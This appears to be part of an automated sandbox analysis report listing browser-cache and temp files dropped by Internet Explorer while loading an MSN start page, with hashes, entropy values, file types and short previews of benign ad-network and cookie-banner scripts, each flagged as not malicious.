                                                MD5:4BDC3742A1EC0F279563374E588C0AE6
                                                SHA1:A7AA170E4D461B5F5360C476939FD9E8E7C9F061
                                                SHA-256:F45A693B9FE42DCE555396A230A3D4996304A500C58AB2F95F3FC45DD1C6E552
                                                SHA-512:741DDF5E2C2D2E2CB2EA2E790DC48F58FE40ACAD4AFBFDC7433F2D97532DB8A448630E2665CE3FA5D2C66DAF0ED8E44D0D0E30DDC8D28766A5CAC6260930BA0D
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAOgK4d[2].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                Category:dropped
                                                Size (bytes):25654
                                                Entropy (8bit):7.962278587448777
                                                Encrypted:false
                                                SSDEEP:768:NQ1iy7DdjBD1GRVu3k5D6bouOMK1lUPN7hSzxW9Op2:NQ1i4RmX2MuOtoN7UzxWI2
                                                MD5:2D55FE852EF6D4104BC138843CEB951A
                                                SHA1:8C51A29E9D667D7CD18BEA006B3F5D98C44D9B09
                                                SHA-256:1F0BCA78B6B16616CD192F6A017343B89774A71178C4861CDE2746E5885720B7
                                                SHA-512:0746C0376F76EE572CBFC8076CCE99554D8F71B68ED339E95A06937622A3837579FC090B78E1651E957E9B93AF9B1DCF357FCA50F6FEC05C09143E4045505001
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAOgkHA[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                Category:dropped
                                                Size (bytes):8589
                                                Entropy (8bit):7.917883695837637
                                                Encrypted:false
                                                SSDEEP:192:Qo6znNwgr1T/regmhcvAa31b1TMu2UQa9uQEEa1Wkfq1:b6znNvRzycvj1TMurxET1bfq1
                                                MD5:464362B49496E353AABF75DA5015B426
                                                SHA1:51C5A1291B3B5746BB5602CD19F68ABA7FFCC838
                                                SHA-256:3F86873DB8AF0970856EE5493C1712D11444B75DA21B3F90E27495BA0AA4B943
                                                SHA-512:D51C63F9D6296FF7035B1D5AFA7973E22250B5A36CB56834F09045ABF87950B4F5F94763578D833B27626AA3981CE0C679C6730AE10CC248CD723E8F5645E2C1
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAzb5EX[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):322
                                                Entropy (8bit):6.966129933463651
                                                Encrypted:false
                                                SSDEEP:6:6v/lhPahmKxf8jCAw4DGQJe1kvnxIekdOgcKOtQExGTFDDv4bp:6v/7IxkjyzQEyaI1QmGTlW
                                                MD5:89E1141C659F2127DD80809F71326697
                                                SHA1:3262110C91000071FDBB0D33893EC1EC8026ADEC
                                                SHA-256:98763AAD3E2B7507E7729711ACD2DACCBD56164FE6DDB10410047B212275C279
                                                SHA-512:1D32DF0DB191F0A3FA152BC47F5F463234224F215A283A26E4EBAF95095A0977ABF5B9D9804FA4DDB276CA8DAE2865789802BB8A18B02B232A9DBB22D5F19E49
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB10MkbM[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):936
                                                Entropy (8bit):7.711185429072882
                                                Encrypted:false
                                                SSDEEP:24:IJJuYNKuGlZLocJZlxAgAbiuoSrZzi1g3+:IJn94F/lxAZiuoSNYgO
                                                MD5:19B9391F3CA20AA5671834C668105A22
                                                SHA1:81C2522FC7C808683191D2469426DFC06100F574
                                                SHA-256:3557A603145306F90828FF3EA70902A1822E8B117F4BDF39933A2A413A79399F
                                                SHA-512:0E4BA430498B10CE0622FF745A4AE352FDA75E44C50C7D5EBBC270E68D56D8750CE89435AE3819ACA7C2DD709264E71CE7415B7EBAB24704B83380A5B99C66DC
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB1cEP3G[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):1088
                                                Entropy (8bit):7.81915680849984
                                                Encrypted:false
                                                SSDEEP:24:FCGPRm4XxHvhNBb6W3bc763IU6+peaq90IUkiRPfoc:/pXBvkW3bc7k1FqWIUkSfB
                                                MD5:24F1589A12D948B741C2E5A0C4F19C2A
                                                SHA1:DC9BB00C5D063F25216CDABB77F5F01EA9F88325
                                                SHA-256:619910A3140A45391D7D3CB50EC4B48F0B0C8A76DC029576127648C4BD4B128C
                                                SHA-512:5D7A17B05E1FD1BC02823EC2719D30BC27A9FA03BCFFE30F3419990E440845842F18797C9071C037417776641AB2CDB86F1F6CD790D70481B3F863451D3249EE
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB7gRE[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):501
                                                Entropy (8bit):7.3374462687222906
                                                Encrypted:false
                                                SSDEEP:12:6v/71zYhg8gNX8GA3PhV8xJy4eOsEfOZbLjz:u8O9A/hSJ9lfkbb
                                                MD5:1FCA95AEED29D3219D0A53A78A041312
                                                SHA1:5A4661CCF1E9F6581F71FC429E599D81B8895297
                                                SHA-256:4B0F37A05AB882DA679792D483B105FDD820639C390FC7636676424ECFD418B9
                                                SHA-512:7E02CEB4A6F91B2D718712E37255F54DA180FA83008E0CE37080DADFE8B4D0D50BC0EA8657B87003D9BAD10FA5581DBB8C1C64D267B6C435DA48CBED3366CDEA
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BBY7ARN[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):779
                                                Entropy (8bit):7.670456272038463
                                                Encrypted:false
                                                SSDEEP:24:dYsfeTaIfpVFdpxXMyN2fFIKdko2boYfm:Jf5ILpCyN29lC5boD
                                                MD5:30801A14BDC1842F543DA129067EA9D8
                                                SHA1:1900A9E6E1FA79FE3DF5EC8B77A6A24BD9F5FD7F
                                                SHA-256:70BB586490198437FFE06C1F44700A2171290B4D2F2F5B6F3E5037EAEBC968A4
                                                SHA-512:8B146404DE0C8E08796C4A6C46DF8315F7335BC896AF11EE30ABFB080E564ED354D0B70AEDE7AF793A2684A319197A472F05A44E2B5C892F117B40F3AF938617
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\a8a064[2].gif
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:GIF image data, version 89a, 28 x 28
                                                Category:dropped
                                                Size (bytes):16360
                                                Entropy (8bit):7.019403238999426
                                                Encrypted:false
                                                SSDEEP:384:g2SEiHys4AeP/6ygbkUZp72i+ccys4AeP/6ygbkUZaoGBm:g2Tjs4Ae36kOpqi+c/s4Ae36kOaoGm
                                                MD5:3CC1C4952C8DC47B76BE62DC076CE3EB
                                                SHA1:65F5CE29BBC6E0C07C6FEC9B96884E38A14A5979
                                                SHA-256:10E48837F429E208A5714D7290A44CD704DD08BF4690F1ABA93C318A30C802D9
                                                SHA-512:5CC1E6F9DACA9CEAB56BD2ECEEB7A523272A664FE8EE4BB0ADA5AF983BA98DBA8ECF3848390DF65DA929A954AC211FF87CE4DBFDC11F5DF0C6E3FEA8A5740EF7
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\auction[1].htm
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):18959
                                                Entropy (8bit):5.781315138449176
                                                Encrypted:false
                                                SSDEEP:384:9Yl/pQJWBn6pKNzAWmAm4BsbF/y/ARMhmZdyLr0j5U8y8X7vL:9YhXNxmDJstUW8lY8Lj
                                                MD5:3CF1EE8A2983412446003A598A5BE743
                                                SHA1:FB44CA22BC0F01C69D6558EC95720A489CD01A3B
                                                SHA-256:0E6D6F2EBC5E97462CEA092F953A4C75325B1B5703B87C0331B8618C96EAA27B
                                                SHA-512:198316F6FE087FD05EFD4427C7261BC91CE7BA0CBA81A1911AD9260D44E7699BB87F6679A215903BA833F4846032FBDA04EBA9B7B5DAF2CEF078B3F6CA94EB7F
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ..<script id="sam-metadata" type="text/html" data-json="{&quot;optout&quot;:{&quot;msaOptOut&quot;:false,&quot;browserOptOut&quot;:false},&quot;taboola&quot;:{&quot;sessionId&quot;:&quot;v2_ac8f95f3e193b6cd50a90b5342db36c8_c897ceee-bab8-45a0-9c84-6f772cce7bfd-tuct834aab7_1631266103_1631266103_CIi3jgYQr4c_GKPb2-n--Jqv2QEgASgBMCs4stANQNCIEEje2NkDUP___________wFYAGAAaKKcqr2pwqnJjgFwAA&quot;},&quot;tbsessionid&quot;:&quot;v2_ac8f95f3e193b6cd50a90b5342db36c8_c897ceee-bab8-45a0-9c84-6f772cce7bfd-tuct834aab7_1631266103_1631266103_CIi3jgYQr4c_GKPb2-n--Jqv2QEgASgBMCs4stANQNCIEEje2NkDUP___________wFYAGAAaKKcqr2pwqnJjgFwAA&quot;,&quot;pageViewId&quot;:&quot;7e44c6b953a846ec90f1f51090b5a28e&quot;,&quot;RequestLevelBeaconUrls&quot;:[]}">..</script>..<li class="triptych serversidenativead hasimage " data-json="{&quot;tvb&quot;:[],&quot;trb&quot;:[],&quot;tjb&quot;:[],&quot;p&quot;:&quot;taboola&quot;,&quot;e&quot;:true}" data-provider="taboola" data-ad-region="infopane" data-ad-index="9" data-viewab
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\cfdbd9[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):740
                                                Entropy (8bit):7.552939906140702
                                                Encrypted:false
                                                SSDEEP:12:6v/70MpfkExg1J0T5F1NRlYx1TEdLh8vJ542irJQ5nnXZkCaOj0cMgL17jXGW:HMuXk5RwTTEovn0AXZMitL9aW
                                                MD5:FE5E6684967766FF6A8AC57500502910
                                                SHA1:3F660AA0433C4DBB33C2C13872AA5A95BC6D377B
                                                SHA-256:3B6770482AF6DA488BD797AD2682C8D204ED536D0D173EE7BB6CE80D479A2EA7
                                                SHA-512:AF9F1BABF872CBF76FC8C6B497E70F07DF1677BB17A92F54DC837BC2158423B5BF1480FF20553927ECA2E3F57D5E23341E88573A1823F3774BFF8871746FFA51
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\de-ch[1].htm
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                Category:dropped
                                                Size (bytes):422276
                                                Entropy (8bit):5.440261079746276
                                                Encrypted:false
                                                SSDEEP:3072:FJQJUHxx+/AkJ8cZnC00vJcemu87IwG8SLLViu2SdnBMlqXXpLV:FJQOO/17RG8ks9lqXX3
                                                MD5:5C1DECE6AA6CEF2180E5BE051CE737D5
                                                SHA1:D47A7B69047601CFD9147C1DEE7DAD0AA61E49A9
                                                SHA-256:08F9EE394FB18E2E65F4E79F80AF5B0A82773C35045A8C9C5C256A94299A6A4D
                                                SHA-512:8341144126BF9CE2A1E9E460D00240CF4D5123084CF42463F36824D75D0CF3C049E1E430C3511B748279BD9F98760B05E8B7BB540D65F1DD582DC7C0D05BFC59
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: <!DOCTYPE html><html prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" lang="de-CH" class="hiperf" dir="ltr" >.. <head data-info="v:20210909_23937236;a:7e44c6b9-53a8-46ec-90f1-f51090b5a28e;cn:4;az:{did:951b20c4cd6d42d29795c846b4755d88, rid: 4, sn: neurope-prod-hp, dt: 2021-09-02T17:28:02.6824904Z, bt: 2021-09-09T00:14:30.9925819Z};ddpi:1;dpio:;dpi:1;dg:tmx.pc.ms.ie10plus;th:start;PageName:startPage;m:de-ch;cb:;l:de-ch;mu:de-ch;ud:{cid:,vk:homepage,n:,l:de-ch,ck:};xd:BBqgbZW;ovc:f;al:;fxd:f;xdpub:2021-08-11 10:21:32Z;xdmap:2021-09-10 09:26:56Z;axd:;f:msnallexpusers,muidflt49cf,muidflt259cf,muidflt300cf,mmxandroid1cf,complianceedge1cf,moneyhp2cf,audexhz3cf,gallery1cf,gallery3cf,onetrustpoplive,1s-bing-news,vebudumu04302020,bbh20200521msn,weather3cf,prg-1sw-cont,prg-1sw-hmtp,msnsapphire1cf,msnsapphire2cf,prg-adspeek,prg-clk-trftms,btrecrow1,1s-winauthservice,prg-wpo-hpolypc,weather7cf,prg-1sw-flyt-htpc,prg-1sw-halfwea,prg-1sw-ownformat,prg-brandupwhp;userOptOut:false;userOptO
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\down[1]
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                Category:dropped
                                                Size (bytes):748
                                                Entropy (8bit):7.249606135668305
                                                Encrypted:false
                                                SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                MD5:C4F558C4C8B56858F15C09037CD6625A
                                                SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\httpErrorPagesScripts[1]
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):12105
                                                Entropy (8bit):5.451485481468043
                                                Encrypted:false
                                                SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                MD5:9234071287E637F85D721463C488704C
                                                SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\http___cdn.taboola.com_libtrc_static_thumbnails_c3cfcb8c707b14064f9cad58b478df43[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                Category:dropped
                                                Size (bytes):16005
                                                Entropy (8bit):7.974492674158552
                                                Encrypted:false
                                                SSDEEP:384:ZvfZN3HwKYkc4MSXxshJ/mZpPvlKjzJjo4nHaLbjT+EbIZa1c9ajzWQ:ZvfZiKYUMSXxsKZhv0zJs4nmbjT+EQc5
                                                MD5:31D2C3F7BE156B4E917D219F6ADCE3AA
                                                SHA1:0927CE01518F0F900BF1BE4AC7151D7BC05EC059
                                                SHA-256:480455F4C2C040254C88ECEBE33EA31A83A194C939E8F8D88BAE094D59CB9D9A
                                                SHA-512:66A8CAE4B065E6AC2EA8716990AB5B797C8AEF341621A3604D39053096D0AA91FF68ACEBCCBD0B28AFCB5A52CD19CE2C00DD1C5884E47A2ED73CC69601DD1FE9
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\medianet[1].htm
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:HTML document, ASCII text, with very long lines
                                                Category:dropped
                                                Size (bytes):400969
                                                Entropy (8bit):5.487971281504038
                                                Encrypted:false
                                                SSDEEP:6144:zFrkYqP1vG2jnmuynGJ8nKM03VCuPbhErMrSN9Gm9:U1vFjKnGJ8KMGxTAM+fGm9
                                                MD5:39D204B8E434FED04DFFAC662270EC30
                                                SHA1:47C81C4800D098802B3A44928223634684C8AF8E
                                                SHA-256:6A7A19E906F19E73E4682085029515FE70393A2825AB1F7FABD7882EA27B006A
                                                SHA-512:0FE9C2DFF0F2502C9839388E59A90FCD5A01CC0118A7795AA1663ECB1F56FC8AB6BB937C7C6DD0C131C8A2CD48D0F3E1E8CDE8A77575D287CD484EBBCECDAF4E
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: <html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs||{},window.mnjs.ERP=window.mnjs.ERP||function(){"use strict";for(var l="",s="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function d(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(a=0;a<3;a++)e+=g[a].length;if(0!==e){for(var n,r=new Image,o=f.lurl||"https://lg3-a.akamaihd.net/nerrping.php",t="",i=0,a=2;0<=a;a--){for(e=g[a].length,0;0<e;){if(n=1===a?g[a][0]:{logLevel:g[a][0].logLevel,errorVal:{name:g[a][0].errorVal.name,type:l,svr:s,servname:c,errId:g[a][0].errId,message:g[a][0].errorVal.message,line:g[a][0].errorVal.lineNumber,description:g[a][0].errorVal.description,stack:g[a][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON||"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\medianet[2].htm
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:HTML document, ASCII text, with very long lines
                                                Category:dropped
                                                Size (bytes):400969
                                                Entropy (8bit):5.487963952733741
                                                Encrypted:false
                                                SSDEEP:6144:zFrkYqP1vG2jnmuynGJ8nKM03VCuPbhErMrSN9Gm9:U1vFjKnGJ8KMGxTAM+fGm9
                                                MD5:AF385D6E018C7CBCE4A0F70C82C0B7F8
                                                SHA1:611C66628F957809FBD54B33927729088BDCA38F
                                                SHA-256:AD6D23329145672954A2B4304AC46CB3D8521EF0918D5C1E90A8AE0697E06F9B
                                                SHA-512:0ABCB66170E3334470C5AF7F90A9CF2DB3E2E7D0E716A961EF5D58850DB753341B56867B155A8734003D2F3EB3109EB65709C0F3076F921A3890C82DA354511D
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: <html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs||{},window.mnjs.ERP=window.mnjs.ERP||function(){"use strict";for(var l="",s="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function d(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(a=0;a<3;a++)e+=g[a].length;if(0!==e){for(var n,r=new Image,o=f.lurl||"https://lg3-a.akamaihd.net/nerrping.php",t="",i=0,a=2;0<=a;a--){for(e=g[a].length,0;0<e;){if(n=1===a?g[a][0]:{logLevel:g[a][0].logLevel,errorVal:{name:g[a][0].errorVal.name,type:l,svr:s,servname:c,errId:g[a][0].errId,message:g[a][0].errorVal.message,line:g[a][0].errorVal.lineNumber,description:g[a][0].errorVal.description,stack:g[a][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON||"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\nrrV27452[1].js
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:ASCII text, with very long lines, with no line terminators
                                                Category:dropped
                                                Size (bytes):90611
                                                Entropy (8bit):5.421500848741912
                                                Encrypted:false
                                                SSDEEP:1536:uEuukXGs7RiUGZFVgRdillux5Q3Yzudp9o9uvby3TdXPH6viqQDkjs2i:atiX0di3p8urMfHgjg
                                                MD5:1EB648466B92897E80D5F3A64D02C011
                                                SHA1:624EE532FED7CCBC60DF3433DC3369AADE0F9226
                                                SHA-256:1C9605652D3D876ACA145E7F46F92E669E6A92C4AB27A1CBB454882BD58A1386
                                                SHA-512:1B7CEED799A6994991DCB8938A3B00BD64E1CEC17EC0775FC1CE844604805FEB20BEC3D72823730712BD0CB45B278F30FDD2CBA7319AD605323F667F39BF801C
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: var _mNRequire,_mNDefine;!function(){"use strict";var c={},u={};function a(e){return"function"==typeof e}_mNRequire=function e(t,r){var n,i,o=[];for(i in t)t.hasOwnProperty(i)&&("object"!=typeof(n=t[i])&&void 0!==n?(void 0!==c[n]||(c[n]=e(u[n].deps,u[n].callback)),o.push(c[n])):o.push(n));return a(r)?r.apply(this,o):o},_mNDefine=function(e,t,r){if(a(t)&&(r=t,t=[]),void 0===(n=e)||""===n||null===n||(n=t,"[object Array]"!==Object.prototype.toString.call(n))||!a(r))return!1;var n;u[e]={deps:t,callback:r}}}();_mNDefine("modulefactory",[],function(){"use strict";var r={},e={},o={},i={},t={},n={},a={},d={},c={},l={};function g(r){var e=!0,o={};try{o=_mNRequire([r])[0]}catch(r){e=!1}return o.isResolved=function(){return e},o}return r=g("conversionpixelcontroller"),e=g("browserhinter"),o=g("kwdClickTargetModifier"),i=g("hover"),t=g("mraidDelayedLogging"),n=g("macrokeywords"),a=g("tcfdatamanager"),d=g("l3-reporting-observer-adapter"),c=g("editorial_blocking"),l=g("debuglogs"),{conversionPixelCo
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\otBannerSdk[1].js
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):374818
                                                Entropy (8bit):5.338137698375348
                                                Encrypted:false
                                                SSDEEP:3072:axBt4stoUf3MiPnDxOFvxYyTcwY+OiHeNUQW2SzDZTpl1L:NUfbPnDxOFvxYyY+Oi+yQW2CDZTn1L
                                                MD5:2E5F92E8C8983AA13AA99F443965BB7D
                                                SHA1:D80209C734F458ABA811737C49E0A1EAF75F9BCA
                                                SHA-256:11D9CC951D602A168BD260809B0FA200D645409B6250BD8E8996882EBE3F5A9D
                                                SHA-512:A699BEC040B1089286F9F258343E012EC2466877CC3C9D3DFEF9D00591C88F976B44D9795E243C7804B62FDC431267E1117C2D42D4B73B7E879AEFB1256C644B
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: /** .. * onetrust-banner-sdk.. * v6.13.0.. * by OneTrust LLC.. * Copyright 2021 .. */..!function(){"use strict";var o=function(e,t){return(o=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var o in t)t.hasOwnProperty(o)&&(e[o]=t[o])})(e,t)};var r=function(){return(r=Object.assign||function(e){for(var t,o=1,n=arguments.length;o<n;o++)for(var r in t=arguments[o])Object.prototype.hasOwnProperty.call(t,r)&&(e[r]=t[r]);return e}).apply(this,arguments)};function a(s,i,l,a){return new(l=l||Promise)(function(e,t){function o(e){try{r(a.next(e))}catch(e){t(e)}}function n(e){try{r(a.throw(e))}catch(e){t(e)}}function r(t){t.done?e(t.value):new l(function(e){e(t.value)}).then(o,n)}r((a=a.apply(s,i||[])).next())})}function d(o,n){var r,s,i,e,l={label:0,sent:function(){if(1&i[0])throw i[1];return i[1]},trys:[],ops:[]};return e={next:t(0),throw:t(1),return:t(2)},"function"==typeof Symbol&&(e[Symbol.iterator]=function(){return this}),e;function t(t
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\q[1].avi
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):5
                                                Entropy (8bit):2.321928094887362
                                                Encrypted:false
                                                SSDEEP:3:3:3
                                                MD5:5BFA51F3A417B98E7443ECA90FC94703
                                                SHA1:8C015D80B8A23F780BDD215DC842B0F5551F63BD
                                                SHA-256:BEBE2853A3485D1C2E5C5BE4249183E0DDAFF9F87DE71652371700A89D937128
                                                SHA-512:4CD03686254BB28754CBAA635AE1264723E2BE80CE1DD0F78D1AB7AEE72232F5B285F79E488E9C5C49FF343015BD07BB8433D6CEE08AE3CEA8C317303E3AC399
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: 0....
                                                C:\Users\user\AppData\Local\Temp\~DF085197608A4DC602.TMP
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):39649
                                                Entropy (8bit):0.5759953467362658
                                                Encrypted:false
                                                SSDEEP:96:kBqoxKAuvScS+vRT6hDXzwcz5gXzwcz54Xzwcz5J:kBqoxKAuqR+vRT6hDk3kzkY
                                                MD5:6CF1AA6E8DE8F92702CAFCF3C6A1F99E
                                                SHA1:D4BFBDD49416FAFE5DA02FF3856AB3A6AA3F2C99
                                                SHA-256:40D608E6EEC2C51518BEE9D2793F36FC316FA6D23195D5BAF3A443FE45408275
                                                SHA-512:A50F2230DB5CB7FE069A70710EA89AF52E0AA703491D3342A1E218019549F174F251B4110F6DE962ADE98B5AA87CEAE53E6FE8EAFEA207E389EE815930D081F9
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Users\user\AppData\Local\Temp\~DF118EEE299414955F.TMP
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):29745
                                                Entropy (8bit):0.29981257862648436
                                                Encrypted:false
                                                SSDEEP:24:c9lLh9lLh9lIn9lIn9lRx/9lRJ9lTb9lTb9lSSU9lSSU9laAa/9laAL3fX1Y9laF:kBqoxxJhHWSVSEabrP1oQ2y
                                                MD5:CAE8393B215372A28D6CBEE84F7FF6F9
                                                SHA1:957208E6A021495CE08A81B1B90605C227C32158
                                                SHA-256:A13B55ACFF6EF8EEFE7703DB00E61DAE4EBA8B9E11F5C9767FFB955672128BF8
                                                SHA-512:C9F5584B01EDA60DECA0C10FAEC745A6D4BB3A0C4B4F36475C20DF7856D32CEA2C7A2644D2B8341F2E237E8C7A5827D5160BACB69C74CBC78D5BEF12CFDA3E84
                                                Malicious:false
                                                Reputation:unknown
                                                C:\Users\user\AppData\Local\Temp\~DF39E39778E7BB16D3.TMP
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):39793
                                                Entropy (8bit):0.6051223796141199
                                                Encrypted:false
                                                SSDEEP:96:kBqoxKAuvScS+w2st2wPdV7kPdV7kPdV7l:kBqoxKAuqR+w2st2wVZkVZkVZl
                                                MD5:EC66E0E9683F2833361C7D7800F4C914
                                                SHA1:29C92DFE12950766A7E8C63ADB1F4C969C1F675B
                                                SHA-256:A6AC90F779A269F039BC30076A7EDDD92AD041D9CDF8F419CBF6AC50E7B4405C
